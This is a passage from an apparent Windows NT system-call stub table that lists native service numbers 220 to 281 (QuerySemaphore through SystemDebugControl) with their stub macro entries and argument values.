SYSSTUBS_ENTRY7 220, QuerySemaphore, 1
SYSSTUBS_ENTRY8 220, QuerySemaphore, 1
SYSSTUBS_ENTRY1 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY2 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY3 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY4 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY5 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY6 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY7 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY8 221, QuerySymbolicLinkObject, 0
SYSSTUBS_ENTRY1 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY2 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY3 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY4 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY5 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY6 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY7 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY8 222, QuerySystemEnvironmentValue, 0
SYSSTUBS_ENTRY1 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY2 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY3 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY4 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY5 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY6 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY7 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY8 223, QuerySystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY1 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY2 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY3 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY4 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY5 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY6 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY7 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY8 224, QueryTimerResolution, 0
SYSSTUBS_ENTRY1 225, RaiseException, 0
SYSSTUBS_ENTRY2 225, RaiseException, 0
SYSSTUBS_ENTRY3 225, RaiseException, 0
SYSSTUBS_ENTRY4 225, RaiseException, 0
SYSSTUBS_ENTRY5 225, RaiseException, 0
SYSSTUBS_ENTRY6 225, RaiseException, 0
SYSSTUBS_ENTRY7 225, RaiseException, 0
SYSSTUBS_ENTRY8 225, RaiseException, 0
SYSSTUBS_ENTRY1 226, RaiseHardError, 2
SYSSTUBS_ENTRY2 226, RaiseHardError, 2
SYSSTUBS_ENTRY3 226, RaiseHardError, 2
SYSSTUBS_ENTRY4 226, RaiseHardError, 2
SYSSTUBS_ENTRY5 226, RaiseHardError, 2
SYSSTUBS_ENTRY6 226, RaiseHardError, 2
SYSSTUBS_ENTRY7 226, RaiseHardError, 2
SYSSTUBS_ENTRY8 226, RaiseHardError, 2
SYSSTUBS_ENTRY1 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY2 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY3 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY4 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY5 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY6 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY7 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY8 227, RegisterThreadTerminatePort, 0
SYSSTUBS_ENTRY1 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY2 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY3 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY4 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY5 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY6 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY7 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY8 228, ReleaseKeyedEvent, 0
SYSSTUBS_ENTRY1 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY2 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY3 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY4 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY5 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY6 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY7 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY8 229, RemoveProcessDebug, 0
SYSSTUBS_ENTRY1 230, RenameKey, 0
SYSSTUBS_ENTRY2 230, RenameKey, 0
SYSSTUBS_ENTRY3 230, RenameKey, 0
SYSSTUBS_ENTRY4 230, RenameKey, 0
SYSSTUBS_ENTRY5 230, RenameKey, 0
SYSSTUBS_ENTRY6 230, RenameKey, 0
SYSSTUBS_ENTRY7 230, RenameKey, 0
SYSSTUBS_ENTRY8 230, RenameKey, 0
SYSSTUBS_ENTRY1 231, ReplaceKey, 0
SYSSTUBS_ENTRY2 231, ReplaceKey, 0
SYSSTUBS_ENTRY3 231, ReplaceKey, 0
SYSSTUBS_ENTRY4 231, ReplaceKey, 0
SYSSTUBS_ENTRY5 231, ReplaceKey, 0
SYSSTUBS_ENTRY6 231, ReplaceKey, 0
SYSSTUBS_ENTRY7 231, ReplaceKey, 0
SYSSTUBS_ENTRY8 231, ReplaceKey, 0
SYSSTUBS_ENTRY1 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY2 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY3 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY4 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY5 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY6 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY7 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY8 232, ReplyWaitReplyPort, 0
SYSSTUBS_ENTRY1 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY2 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY3 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY4 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY5 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY6 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY7 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY8 233, RequestDeviceWakeup, 0
SYSSTUBS_ENTRY1 234, RequestPort, 0
SYSSTUBS_ENTRY2 234, RequestPort, 0
SYSSTUBS_ENTRY3 234, RequestPort, 0
SYSSTUBS_ENTRY4 234, RequestPort, 0
SYSSTUBS_ENTRY5 234, RequestPort, 0
SYSSTUBS_ENTRY6 234, RequestPort, 0
SYSSTUBS_ENTRY7 234, RequestPort, 0
SYSSTUBS_ENTRY8 234, RequestPort, 0
SYSSTUBS_ENTRY1 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY2 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY3 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY4 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY5 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY6 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY7 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY8 235, RequestWakeupLatency, 0
SYSSTUBS_ENTRY1 236, ResetEvent, 0
SYSSTUBS_ENTRY2 236, ResetEvent, 0
SYSSTUBS_ENTRY3 236, ResetEvent, 0
SYSSTUBS_ENTRY4 236, ResetEvent, 0
SYSSTUBS_ENTRY5 236, ResetEvent, 0
SYSSTUBS_ENTRY6 236, ResetEvent, 0
SYSSTUBS_ENTRY7 236, ResetEvent, 0
SYSSTUBS_ENTRY8 236, ResetEvent, 0
SYSSTUBS_ENTRY1 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY2 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY3 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY4 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY5 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY6 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY7 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY8 237, ResetWriteWatch, 0
SYSSTUBS_ENTRY1 238, RestoreKey, 0
SYSSTUBS_ENTRY2 238, RestoreKey, 0
SYSSTUBS_ENTRY3 238, RestoreKey, 0
SYSSTUBS_ENTRY4 238, RestoreKey, 0
SYSSTUBS_ENTRY5 238, RestoreKey, 0
SYSSTUBS_ENTRY6 238, RestoreKey, 0
SYSSTUBS_ENTRY7 238, RestoreKey, 0
SYSSTUBS_ENTRY8 238, RestoreKey, 0
SYSSTUBS_ENTRY1 239, ResumeProcess, 0
SYSSTUBS_ENTRY2 239, ResumeProcess, 0
SYSSTUBS_ENTRY3 239, ResumeProcess, 0
SYSSTUBS_ENTRY4 239, ResumeProcess, 0
SYSSTUBS_ENTRY5 239, ResumeProcess, 0
SYSSTUBS_ENTRY6 239, ResumeProcess, 0
SYSSTUBS_ENTRY7 239, ResumeProcess, 0
SYSSTUBS_ENTRY8 239, ResumeProcess, 0
SYSSTUBS_ENTRY1 240, SaveKey, 0
SYSSTUBS_ENTRY2 240, SaveKey, 0
SYSSTUBS_ENTRY3 240, SaveKey, 0
SYSSTUBS_ENTRY4 240, SaveKey, 0
SYSSTUBS_ENTRY5 240, SaveKey, 0
SYSSTUBS_ENTRY6 240, SaveKey, 0
SYSSTUBS_ENTRY7 240, SaveKey, 0
SYSSTUBS_ENTRY8 240, SaveKey, 0
SYSSTUBS_ENTRY1 241, SaveKeyEx, 0
SYSSTUBS_ENTRY2 241, SaveKeyEx, 0
SYSSTUBS_ENTRY3 241, SaveKeyEx, 0
SYSSTUBS_ENTRY4 241, SaveKeyEx, 0
SYSSTUBS_ENTRY5 241, SaveKeyEx, 0
SYSSTUBS_ENTRY6 241, SaveKeyEx, 0
SYSSTUBS_ENTRY7 241, SaveKeyEx, 0
SYSSTUBS_ENTRY8 241, SaveKeyEx, 0
SYSSTUBS_ENTRY1 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY2 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY3 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY4 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY5 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY6 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY7 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY8 242, SaveMergedKeys, 0
SYSSTUBS_ENTRY1 243, SecureConnectPort, 5
SYSSTUBS_ENTRY2 243, SecureConnectPort, 5
SYSSTUBS_ENTRY3 243, SecureConnectPort, 5
SYSSTUBS_ENTRY4 243, SecureConnectPort, 5
SYSSTUBS_ENTRY5 243, SecureConnectPort, 5
SYSSTUBS_ENTRY6 243, SecureConnectPort, 5
SYSSTUBS_ENTRY7 243, SecureConnectPort, 5
SYSSTUBS_ENTRY8 243, SecureConnectPort, 5
SYSSTUBS_ENTRY1 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY2 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY3 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY4 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY5 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY6 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY7 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY8 244, SetBootEntryOrder, 0
SYSSTUBS_ENTRY1 245, SetBootOptions, 0
SYSSTUBS_ENTRY2 245, SetBootOptions, 0
SYSSTUBS_ENTRY3 245, SetBootOptions, 0
SYSSTUBS_ENTRY4 245, SetBootOptions, 0
SYSSTUBS_ENTRY5 245, SetBootOptions, 0
SYSSTUBS_ENTRY6 245, SetBootOptions, 0
SYSSTUBS_ENTRY7 245, SetBootOptions, 0
SYSSTUBS_ENTRY8 245, SetBootOptions, 0
SYSSTUBS_ENTRY1 246, SetContextThread, 0
SYSSTUBS_ENTRY2 246, SetContextThread, 0
SYSSTUBS_ENTRY3 246, SetContextThread, 0
SYSSTUBS_ENTRY4 246, SetContextThread, 0
SYSSTUBS_ENTRY5 246, SetContextThread, 0
SYSSTUBS_ENTRY6 246, SetContextThread, 0
SYSSTUBS_ENTRY7 246, SetContextThread, 0
SYSSTUBS_ENTRY8 246, SetContextThread, 0
SYSSTUBS_ENTRY1 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY2 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY3 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY4 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY5 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY6 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY7 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY8 247, SetDebugFilterState, 0
SYSSTUBS_ENTRY1 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY2 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY3 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY4 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY5 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY6 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY7 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY8 248, SetDefaultHardErrorPort, 0
SYSSTUBS_ENTRY1 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY2 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY3 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY4 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY5 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY6 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY7 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY8 249, SetDefaultLocale, 0
SYSSTUBS_ENTRY1 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY2 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY3 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY4 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY5 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY6 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY7 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY8 250, SetDefaultUILanguage, 0
SYSSTUBS_ENTRY1 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY2 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY3 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY4 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY5 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY6 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY7 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY8 251, SetDriverEntryOrder, 0
SYSSTUBS_ENTRY1 252, SetEaFile, 0
SYSSTUBS_ENTRY2 252, SetEaFile, 0
SYSSTUBS_ENTRY3 252, SetEaFile, 0
SYSSTUBS_ENTRY4 252, SetEaFile, 0
SYSSTUBS_ENTRY5 252, SetEaFile, 0
SYSSTUBS_ENTRY6 252, SetEaFile, 0
SYSSTUBS_ENTRY7 252, SetEaFile, 0
SYSSTUBS_ENTRY8 252, SetEaFile, 0
SYSSTUBS_ENTRY1 253, SetHighEventPair, 0
SYSSTUBS_ENTRY2 253, SetHighEventPair, 0
SYSSTUBS_ENTRY3 253, SetHighEventPair, 0
SYSSTUBS_ENTRY4 253, SetHighEventPair, 0
SYSSTUBS_ENTRY5 253, SetHighEventPair, 0
SYSSTUBS_ENTRY6 253, SetHighEventPair, 0
SYSSTUBS_ENTRY7 253, SetHighEventPair, 0
SYSSTUBS_ENTRY8 253, SetHighEventPair, 0
SYSSTUBS_ENTRY1 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY2 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY3 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY4 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY5 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY6 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY7 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY8 254, SetHighWaitLowEventPair, 0
SYSSTUBS_ENTRY1 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY2 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY3 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY4 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY5 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY6 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY7 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY8 255, SetInformationDebugObject, 1
SYSSTUBS_ENTRY1 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY2 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY3 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY4 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY5 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY6 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY7 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY8 256, SetInformationJobObject, 0
SYSSTUBS_ENTRY1 257, SetInformationKey, 0
SYSSTUBS_ENTRY2 257, SetInformationKey, 0
SYSSTUBS_ENTRY3 257, SetInformationKey, 0
SYSSTUBS_ENTRY4 257, SetInformationKey, 0
SYSSTUBS_ENTRY5 257, SetInformationKey, 0
SYSSTUBS_ENTRY6 257, SetInformationKey, 0
SYSSTUBS_ENTRY7 257, SetInformationKey, 0
SYSSTUBS_ENTRY8 257, SetInformationKey, 0
SYSSTUBS_ENTRY1 258, SetInformationToken, 0
SYSSTUBS_ENTRY2 258, SetInformationToken, 0
SYSSTUBS_ENTRY3 258, SetInformationToken, 0
SYSSTUBS_ENTRY4 258, SetInformationToken, 0
SYSSTUBS_ENTRY5 258, SetInformationToken, 0
SYSSTUBS_ENTRY6 258, SetInformationToken, 0
SYSSTUBS_ENTRY7 258, SetInformationToken, 0
SYSSTUBS_ENTRY8 258, SetInformationToken, 0
SYSSTUBS_ENTRY1 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY2 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY3 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY4 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY5 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY6 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY7 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY8 259, SetIntervalProfile, 0
SYSSTUBS_ENTRY1 260, SetIoCompletion, 1
SYSSTUBS_ENTRY2 260, SetIoCompletion, 1
SYSSTUBS_ENTRY3 260, SetIoCompletion, 1
SYSSTUBS_ENTRY4 260, SetIoCompletion, 1
SYSSTUBS_ENTRY5 260, SetIoCompletion, 1
SYSSTUBS_ENTRY6 260, SetIoCompletion, 1
SYSSTUBS_ENTRY7 260, SetIoCompletion, 1
SYSSTUBS_ENTRY8 260, SetIoCompletion, 1
SYSSTUBS_ENTRY1 261, SetLdtEntries, 2
SYSSTUBS_ENTRY2 261, SetLdtEntries, 2
SYSSTUBS_ENTRY3 261, SetLdtEntries, 2
SYSSTUBS_ENTRY4 261, SetLdtEntries, 2
SYSSTUBS_ENTRY5 261, SetLdtEntries, 2
SYSSTUBS_ENTRY6 261, SetLdtEntries, 2
SYSSTUBS_ENTRY7 261, SetLdtEntries, 2
SYSSTUBS_ENTRY8 261, SetLdtEntries, 2
SYSSTUBS_ENTRY1 262, SetLowEventPair, 0
SYSSTUBS_ENTRY2 262, SetLowEventPair, 0
SYSSTUBS_ENTRY3 262, SetLowEventPair, 0
SYSSTUBS_ENTRY4 262, SetLowEventPair, 0
SYSSTUBS_ENTRY5 262, SetLowEventPair, 0
SYSSTUBS_ENTRY6 262, SetLowEventPair, 0
SYSSTUBS_ENTRY7 262, SetLowEventPair, 0
SYSSTUBS_ENTRY8 262, SetLowEventPair, 0
SYSSTUBS_ENTRY1 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY2 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY3 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY4 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY5 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY6 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY7 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY8 263, SetLowWaitHighEventPair, 0
SYSSTUBS_ENTRY1 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY2 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY3 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY4 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY5 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY6 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY7 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY8 264, SetQuotaInformationFile, 0
SYSSTUBS_ENTRY1 265, SetSecurityObject, 0
SYSSTUBS_ENTRY2 265, SetSecurityObject, 0
SYSSTUBS_ENTRY3 265, SetSecurityObject, 0
SYSSTUBS_ENTRY4 265, SetSecurityObject, 0
SYSSTUBS_ENTRY5 265, SetSecurityObject, 0
SYSSTUBS_ENTRY6 265, SetSecurityObject, 0
SYSSTUBS_ENTRY7 265, SetSecurityObject, 0
SYSSTUBS_ENTRY8 265, SetSecurityObject, 0
SYSSTUBS_ENTRY1 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY2 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY3 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY4 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY5 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY6 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY7 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY8 266, SetSystemEnvironmentValue, 0
SYSSTUBS_ENTRY1 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY2 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY3 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY4 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY5 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY6 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY7 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY8 267, SetSystemEnvironmentValueEx, 1
SYSSTUBS_ENTRY1 268, SetSystemInformation, 0
SYSSTUBS_ENTRY2 268, SetSystemInformation, 0
SYSSTUBS_ENTRY3 268, SetSystemInformation, 0
SYSSTUBS_ENTRY4 268, SetSystemInformation, 0
SYSSTUBS_ENTRY5 268, SetSystemInformation, 0
SYSSTUBS_ENTRY6 268, SetSystemInformation, 0
SYSSTUBS_ENTRY7 268, SetSystemInformation, 0
SYSSTUBS_ENTRY8 268, SetSystemInformation, 0
SYSSTUBS_ENTRY1 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY2 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY3 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY4 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY5 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY6 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY7 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY8 269, SetSystemPowerState, 0
SYSSTUBS_ENTRY1 270, SetSystemTime, 0
SYSSTUBS_ENTRY2 270, SetSystemTime, 0
SYSSTUBS_ENTRY3 270, SetSystemTime, 0
SYSSTUBS_ENTRY4 270, SetSystemTime, 0
SYSSTUBS_ENTRY5 270, SetSystemTime, 0
SYSSTUBS_ENTRY6 270, SetSystemTime, 0
SYSSTUBS_ENTRY7 270, SetSystemTime, 0
SYSSTUBS_ENTRY8 270, SetSystemTime, 0
SYSSTUBS_ENTRY1 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY2 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY3 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY4 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY5 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY6 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY7 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY8 271, SetThreadExecutionState, 0
SYSSTUBS_ENTRY1 272, SetTimerResolution, 0
SYSSTUBS_ENTRY2 272, SetTimerResolution, 0
SYSSTUBS_ENTRY3 272, SetTimerResolution, 0
SYSSTUBS_ENTRY4 272, SetTimerResolution, 0
SYSSTUBS_ENTRY5 272, SetTimerResolution, 0
SYSSTUBS_ENTRY6 272, SetTimerResolution, 0
SYSSTUBS_ENTRY7 272, SetTimerResolution, 0
SYSSTUBS_ENTRY8 272, SetTimerResolution, 0
SYSSTUBS_ENTRY1 273, SetUuidSeed, 0
SYSSTUBS_ENTRY2 273, SetUuidSeed, 0
SYSSTUBS_ENTRY3 273, SetUuidSeed, 0
SYSSTUBS_ENTRY4 273, SetUuidSeed, 0
SYSSTUBS_ENTRY5 273, SetUuidSeed, 0
SYSSTUBS_ENTRY6 273, SetUuidSeed, 0
SYSSTUBS_ENTRY7 273, SetUuidSeed, 0
SYSSTUBS_ENTRY8 273, SetUuidSeed, 0
SYSSTUBS_ENTRY1 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY2 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY3 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY4 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY5 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY6 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY7 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY8 274, SetVolumeInformationFile, 1
SYSSTUBS_ENTRY1 275, ShutdownSystem, 0
SYSSTUBS_ENTRY2 275, ShutdownSystem, 0
SYSSTUBS_ENTRY3 275, ShutdownSystem, 0
SYSSTUBS_ENTRY4 275, ShutdownSystem, 0
SYSSTUBS_ENTRY5 275, ShutdownSystem, 0
SYSSTUBS_ENTRY6 275, ShutdownSystem, 0
SYSSTUBS_ENTRY7 275, ShutdownSystem, 0
SYSSTUBS_ENTRY8 275, ShutdownSystem, 0
SYSSTUBS_ENTRY1 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY2 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY3 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY4 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY5 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY6 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY7 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY8 276, SignalAndWaitForSingleObject, 0
SYSSTUBS_ENTRY1 277, StartProfile, 0
SYSSTUBS_ENTRY2 277, StartProfile, 0
SYSSTUBS_ENTRY3 277, StartProfile, 0
SYSSTUBS_ENTRY4 277, StartProfile, 0
SYSSTUBS_ENTRY5 277, StartProfile, 0
SYSSTUBS_ENTRY6 277, StartProfile, 0
SYSSTUBS_ENTRY7 277, StartProfile, 0
SYSSTUBS_ENTRY8 277, StartProfile, 0
SYSSTUBS_ENTRY1 278, StopProfile, 0
SYSSTUBS_ENTRY2 278, StopProfile, 0
SYSSTUBS_ENTRY3 278, StopProfile, 0
SYSSTUBS_ENTRY4 278, StopProfile, 0
SYSSTUBS_ENTRY5 278, StopProfile, 0
SYSSTUBS_ENTRY6 278, StopProfile, 0
SYSSTUBS_ENTRY7 278, StopProfile, 0
SYSSTUBS_ENTRY8 278, StopProfile, 0
SYSSTUBS_ENTRY1 279, SuspendProcess, 0
SYSSTUBS_ENTRY2 279, SuspendProcess, 0
SYSSTUBS_ENTRY3 279, SuspendProcess, 0
SYSSTUBS_ENTRY4 279, SuspendProcess, 0
SYSSTUBS_ENTRY5 279, SuspendProcess, 0
SYSSTUBS_ENTRY6 279, SuspendProcess, 0
SYSSTUBS_ENTRY7 279, SuspendProcess, 0
SYSSTUBS_ENTRY8 279, SuspendProcess, 0
SYSSTUBS_ENTRY1 280, SuspendThread, 0
SYSSTUBS_ENTRY2 280, SuspendThread, 0
SYSSTUBS_ENTRY3 280, SuspendThread, 0
SYSSTUBS_ENTRY4 280, SuspendThread, 0
SYSSTUBS_ENTRY5 280, SuspendThread, 0
SYSSTUBS_ENTRY6 280, SuspendThread, 0
SYSSTUBS_ENTRY7 280, SuspendThread, 0
SYSSTUBS_ENTRY8 280, SuspendThread, 0
SYSSTUBS_ENTRY1 281, SystemDebugControl, 2
